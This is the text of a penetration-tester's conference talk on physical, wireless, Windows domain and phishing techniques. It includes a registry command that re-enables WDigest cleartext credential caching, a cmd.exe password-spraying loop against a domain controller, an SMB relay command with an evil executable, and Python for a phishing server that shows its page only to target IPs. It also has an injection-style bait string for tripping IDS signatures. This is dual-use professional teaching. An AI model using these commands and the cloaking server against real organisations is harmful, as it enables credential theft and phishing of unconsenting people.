Stupid Pentester Tricks

AKA Tantric Pentesting

by Laurent Desaulniers



  • Pentester

  • Magician

  • Nsec Challenge Designer

  • Lockpicker

  • Security Amateur


If it is stupid and it works, then it is not stupid *


Client has:
  • EMET/SRP/LAPS everywhere

  • Patches everywhere

  • 24/7 surveillance

  • Medeco

  • NAC

  • 15 character minimum password policy

  • No NetBIOS/LLMNR, so no Responder <3


table flip

Physical Pentest is hard

Repeat after me: I AM NOT JAMES BOND

  • A Proxmark or RavenHID reader is conspicuous

  • Key Impressioning is hard

  • Lockpicking can be hard, under pressure

Physical is hard

key mold

Physical Pentest

  • Always keep spare keys for switching



Demo 1

Universal Door Controller *

* Pending approval from the demo gods

Universal door controller


Conspicuous Proxmark?


Access card


Hackers take selfies too…​



Wifi is hard

Client has EAP, well configured clients, and only accepts valid certificates

table flip 2


Simple access point + captive portal

DO NOT reuse an existing corporate SSID.

Create your own.

→ Bypasses most WIPS solutions: they mainly look for evil twins of the SSIDs they protect and for unauthorized APs plugged into the wired network, not for a new open network with its own name.

Hacking is hard

With most organisations, you can still win using:

  • Responder

  • GPP (Group Policy Preferences passwords left in SYSVOL)

  • Mimikatz

Hacking is hard

But what happens when all of these are blocked

table flip 3

Mimikatz blocked

If you can run Mimikatz, you are already local admin.

So you can undo the anti-Mimikatz hardening (KB2871997 / the Windows 8.1+ default) and turn WDigest cleartext caching back on:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Caveat: this does not recover credentials already in memory, only those of users who log on after the change. Setting this value is a well-known detection (registry auditing or Sysmon Event ID 13 on this key), so assume someone may be watching it.


Password spraying is a very effective technique

Try 1 password against all accounts (and stay under the lockout threshold)

  • Soleil01 (Quebec)

  • CompanyName2016

  • Welcome1

Passwords guaranteed


No PowerShell? No problem! One password against every account from cmd.exe (the UNC backslashes are required; use %%n and %%p instead of %n and %p inside a .bat file):

@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL

Keep pass.txt to a single password per run: the outer loop is per user, so a long pass.txt burns the whole lockout budget on one account before moving to the next.

SMB Relay

20 character password policy? No problem! Relaying never touches the password.

SMB relay is very hard to protect against: the real fix is requiring SMB signing on every host, not just domain controllers.

Nessus classifies the finding (SMB signing not required) as low

./ -h [My_IP] -e [My_EVIL_EXE]

Nothing works? Call support

If you can get tech support to connect to you, you won!

  • My favourites are:

  • "My screen’s background is asking me for money"

  • "Why did you install a dancing pig icon telling me to call tech support?"

Nothing works? Call the help desk

You can then:

Freeze the RAM
SMB relay


Improve your phishing game

Do NOT use security-related pretexts

People are trained to recognize those as phishing.

Cheating at phishing

Test was supposed to be secret…​ But suddenly, everyone knows about it?


Cheating at phishing

I always include an SMB relay image (an image whose source is a UNC path to my host) in all my phish.

Users are told to forward phishing to tech support, so the help desk's client fetches the image too.

Domain selection

Using - instead of . works wonders: vpn.example.com becomes vpn-example.com, a name that reads like a subdomain of the target but is a domain you register yourself.

Domain Selection

Always set up valid SPF records for the phishing domain.

Helps to prevent being categorized as spam.

Make sure that the website is properly categorized by the web-proxy vendors' crawlers before the campaign starts.

HINT Redirect all IPs to the original website, except your target's.
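The HINT above, as an added example (not code from the talk): a minimal front end that serves the landing page only to the target's egress addresses and sends everyone else, crawlers and mail scanners included, to the site being impersonated, path preserved. The netblocks (TEST-NET ranges), the real-site URL and the landing page are placeholders.

```python
"""Serve the phishing page only to the target's egress IPs (added example, not from the talk)."""
import ipaddress
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict, Tuple

# Assumed target egress ranges; TEST-NET blocks used as placeholders.
TARGET_NETS = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "198.51.100.0/24")]
REAL_SITE = "https://www.example.com"      # placeholder: the site being impersonated
LANDING_PAGE = b"<html><body><h1>Sign in</h1></body></html>"  # placeholder landing page


def is_target(client_ip: str) -> bool:
    """True only for addresses inside the target's known egress ranges."""
    try:
        ip = ipaddress.ip_address(client_ip)
    except ValueError:          # garbage in X-Forwarded-For style headers, etc.
        return False
    return any(ip in net for net in TARGET_NETS)


def route(client_ip: str, path: str) -> Tuple[int, Dict[str, str], bytes]:
    """Decide the response: landing page for the target, 302 to the real site for anyone else.

    The redirect keeps the requested path so a categorization crawler sees a
    faithful mirror of the real site rather than a parked page."""
    if is_target(client_ip):
        return 200, {"Content-Type": "text/html; charset=utf-8"}, LANDING_PAGE
    return 302, {"Location": REAL_SITE + path}, b""


class Handler(BaseHTTPRequestHandler):
    def do_GET(self) -> None:
        # Uses the TCP peer address on purpose: only trust X-Forwarded-For if
        # this sits behind a reverse proxy you control, since clients can forge it.
        status, headers, body = route(self.client_address[0], self.path)
        self.send_response(status)
        for name, value in headers.items():
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    do_HEAD = do_GET


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), Handler).serve_forever()
```

Put TLS in front of it (or terminate TLS on a proxy that passes the real client address through) before pointing the lookalike domain at it; a redirect over plain HTTP on a site you claim is a login page is itself a tell.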

Key points

I use Phishing Frenzy for all of my phishing needs.

I am told GoPhish is very good as well.

Other tricks

Put a canary in the Referer of your requests to the target, a string built to trip every WAF and IDS signature at once, pointing at a host you control:

Or '1'='<script>alert(1)>../../../passwd%0a%0d

If the referer URL then gets crawled, you know that someone is watching the logs.
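The canary above, made concrete as an added example (not code from the talk): one function builds a per-target referer URL whose path carries a unique token and whose query carries the signature bait, and another reads your own canary host's access log (Apache combined format) to report who followed it. The host name, the token and the log lines are constructed for the demo.

```python
"""Referer canary: build the bait URL and detect who followed it (added example, not from the talk)."""
import re
import secrets
from typing import List, Optional, Tuple
from urllib.parse import quote

# Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Bait chosen to match as many IDS/WAF signatures as possible (SQLi, XSS,
# traversal, CRLF); it never needs to work, only to be noticed.
BAIT = "' OR '1'='<script>alert(1)</script>../../../etc/passwd%0a%0d"


def make_canary(host: str, token: Optional[str] = None) -> Tuple[str, str]:
    """Return (token, referer_url). One token per target tells you whose logs were read."""
    token = token or secrets.token_hex(8)
    referer = f"http://{host}/{token}/?q={quote(BAIT, safe='')}"
    return token, referer


def log_readers(log_lines: List[str], token: str) -> List[Tuple[str, str, str]]:
    """Return (ip, time, user_agent) for every request to the token path.

    Only the request path is matched: a browser that followed the canary also
    fetches /favicon.ico with the canary URL as referer, and counting that
    would report the same visit twice."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and f"/{token}/" in m["path"]:
            hits.append((m["ip"], m["time"], m["ua"]))
    return hits


# Constructed access log of the canary host: one analyst visit, one unrelated
# request, and the analyst's browser's follow-up favicon fetch.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2016:09:14:02 -0400] "GET /deadbeefcafef00d/?q=%27%20OR HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64)"',
    '198.51.100.4 - - [12/May/2016:09:15:40 -0400] "GET / HTTP/1.1" 200 612 "-" "curl/7.47.0"',
    '203.0.113.7 - - [12/May/2016:09:16:01 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "http://canary.example.net/deadbeefcafef00d/" "Mozilla/5.0 (Windows NT 6.1; WOW64)"',
]


if __name__ == "__main__":
    token, referer = make_canary("canary.example.net", "deadbeefcafef00d")
    print("send requests with Referer:", referer)
    for ip, when, ua in log_readers(SAMPLE_LOG, token):
        print(f"log watcher at {ip} on {when} ({ua})")
```

The user agent of the hit is the useful part: a full browser string means a human opened the URL from a SIEM or log viewer, while a scanner string means the referer was harvested automatically, and either way the blue team knows something happened.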



Thank you